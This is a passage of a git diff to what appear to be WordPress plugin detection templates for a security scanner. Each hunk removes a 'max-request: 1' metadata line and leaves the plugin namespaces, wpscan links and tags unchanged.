metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8881e23860..8e1cb46cf0 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 0bc823830f..c45ef4bf89 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index 7fbeea5917..a224d85727 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: - max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 829edad042..56d2e4efcd 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ 